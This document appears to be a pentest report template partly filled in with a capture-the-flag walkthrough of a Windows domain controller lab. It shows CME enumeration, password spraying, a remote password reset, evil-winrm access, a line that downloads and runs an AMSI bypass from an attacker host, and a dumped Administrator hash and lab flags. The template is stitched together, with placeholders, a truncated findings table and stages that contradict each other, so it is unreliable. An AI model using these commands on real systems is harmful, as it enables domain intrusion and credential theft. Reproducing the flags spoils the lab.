Executive Summary
This comprehensive report documents a simulated penetration test aimed at assessing the security posture of a corporate network with the ultimate goal of compromising the forest domain controller. The test was designed to emulate a sophisticated adversarial attack that strategically uses multiple cycles of lateral movement and privilege escalation. The test utilized a variety of attack techniques that align with the MITRE ATT&CK framework, each carefully chosen to exploit specific vulnerabilities within the network.
Key findings include several high-risk vulnerabilities that allowed for successive breaches and escalations within the network infrastructure, culminating in complete control over the domain controller. The report concludes with targeted recommendations for strengthening the network’s defenses, improving detection capabilities, and reducing the overall attack surface.
High-Level Summary
- Key Vulnerabilities: Identified critical vulnerabilities included insecure service configurations, credential misuse, and several unpatched systems.
- Attack Path: Demonstrated a multi-layered attack strategy involving four stages of lateral movement and multiple privilege escalations.
- Impact: Full domain compromise was achieved, highlighting significant risks in current security practices and the potential for severe data breaches and system manipulation.
Write here any story what is there and how we obtained the machines
Key Findings
| Stage | Target System | Technique | CVSS Score | Impact |
|---|---|---|---|---|
| 1 | Web Server | Phishing | 7.5 | High |
| 2 | Workstation | Local Exploit | 8.0 | High |
| 3 | Departmental Server | Pass the Ticket | 7.4 | High |
| 4 | Departmental Server | Software Exploit | 8.5 | High |
| 5 | Domain Controller | Remote Desktop | 7.8 | High |
| 6 | Domain Controller | Token Forging | 8.2 | High |
| 7 | Admin Server |
Attack Flow and Narrative
Stage 1: Initial Access
- Target System: External Corporate Web Server
- Technique: Phishing (T1566)
- Details: Initiated the attack chain by exploiting a phishing attack to deliver and execute malware on a user’s workstation.
- CVSS Score: 7.5 (High)
Stage 2: Privilege Escalation
- Target System: User’s Workstation
- Technique: Exploitation for Privilege Escalation (T1068)
- Details: Used a local exploit to gain administrative rights on the user’s workstation.
- CVSS Score: 8.0 (High)
Stage 3: First Lateral Movement
- Target System: Departmental Server
- Technique: Pass the Ticket (T1550.003)
- Details: Leveraged stolen Kerberos tickets from the compromised workstation to access the departmental server.
- CVSS Score: 7.4 (High)
Stage 4: Second Privilege Escalation
- Target System: Departmental Server
- Technique: Exploitation for Privilege Escalation (T1068)
- Details: Exploited a vulnerability in third-party software to obtain domain-level credentials.
- CVSS Score: 8.5 (High)
Stage 5: Second Lateral Movement
- Target System: Secondary Domain Controller
- Technique: Remote Services (T1021)
- Details: Used domain credentials to access the secondary domain controller via Remote Desktop.
- CVSS Score: 7.8 (High)
Stage 6: Third Privilege Escalation
- Target System: Secondary Domain Controller
- Technique: Forge Web Credentials (T1606)
- Details: Forged authentication tokens to increase access privileges within the domain.
- CVSS Score: 8.2 (High)
Stage 7: Third Lateral Movement
- Target System: Main IT Administration Server
- Technique: Lateral Tool Transfer (T1570)
- Details: Transferred and executed a custom remote access tool to the main IT admin server.
- CVSS Score: 7.5 (High)
Stage 8: Final Privilege Escalation
- Target System: Forest Domain Controller
- Technique: DCSync (T1003.006)
- Details: Performed a DCSync attack from the IT admin server to replicate domain controller privileges.
- CVSS Score: 9.0 (Critical)
| Server IP Address | Hostname | Compromised | Low-Privilege User | High-Privilege User |
|---|---|---|---|---|
| 192.168.X.X | HOSTNAME | No | N/A | N/A |
| 192.168.X.X | HOSTNAME | Yes | user | root |
| 192.168.X.X | HOSTNAME | Yes | N/A | root |
Detailed Findings and Recommendations
10.10.77.248
Recon
rustscan -a 10.10.77.248 --ulimit 5000 -- -Pn -sC -sV -oA baby
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-04-30 20:15:48Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-04-30T20:16:41+00:00
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-04-29T20:11:46
| Not valid after: 2024-10-29T20:11:46
| MD5: 55ca:d6fe:bd22:5262:0349:0a44:f845:a4fc
| SHA-1: 8e98:831e:5131:4584:0619:ead1:d401:a0b1:fbbb:55e6
|_ssl-date: 2024-04-30T20:17:20+00:00; +7s from scanner time.
5357/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack .NET Message Framing
49664/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Resource Development
Changing the /etc/hosts file.
Scanning
Ldap Anonymous enumeration using CME
cme ldap 10.10.77.248 -u '' -p '' --users
cme ldap 10.10.77.248 -u '' -p '' -M user-desc
Once I found the password i used users.txt file and brute forced it with the newly found password.
cme smb 10.10.77.248 -u only_users.txt -p 'BabyStart123!'
Initial Access (Resetting an Expired Password Remotely)
STATUS_PASSWORD_MUST_CHANGE
smbpasswd.py -newpass Password123! caroline.robinson@10.10.64.245
cme smb 10.10.77.248 -u only_users.txt -p 'Password123!'
Sliver getting shell through winrm
evil-winrm -i 10.10.127.198 -u caroline.robinson -p 'Password123!'
(New-Object System.Net.WebClient).DownloadString("http://10.8.2.41/amsi64.txt") | IEX
Host Recon
getprivs
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
VL{9000cab96bcf62e99073ff5f6653ce90}
*Evil-WinRM* PS C:\Users\caroline.robinson\desktop> cat user.txt
VL{b2c6150b85125d32f4b253df9540d898}
Additional Items
Appendix - AMSI Bypass code
Appendix - Powershell Shellcoderunner
Appendix - ANOTHER_SHELLCODE_USED Shellcoderunner Code
Appendix - Risk Assessment Matrix
Appendix - Proof and Local Contents
| Hostname | local.txt Contents | proof.txt Contents |
|---|---|---|
| HOSTNAME | foo | bar |
| HOSTNAME | foo | bar |
Appendix - Credentials obtained
NTLM Hashes
| Username | NTLM Hash | Found in |
|---|---|---|
| Administrator | HASH | HOSTNAME |
Passwords
| Found in | Corresponds to | Password |
|---|---|---|
| HOSTNAME | USER BELONGS | Password123* |
Credential’s files
| Found in | File | Type |
|---|---|---|
| HOSTNAME | FILE FROM WHERE IS IT | Example: SSH Priv. Key |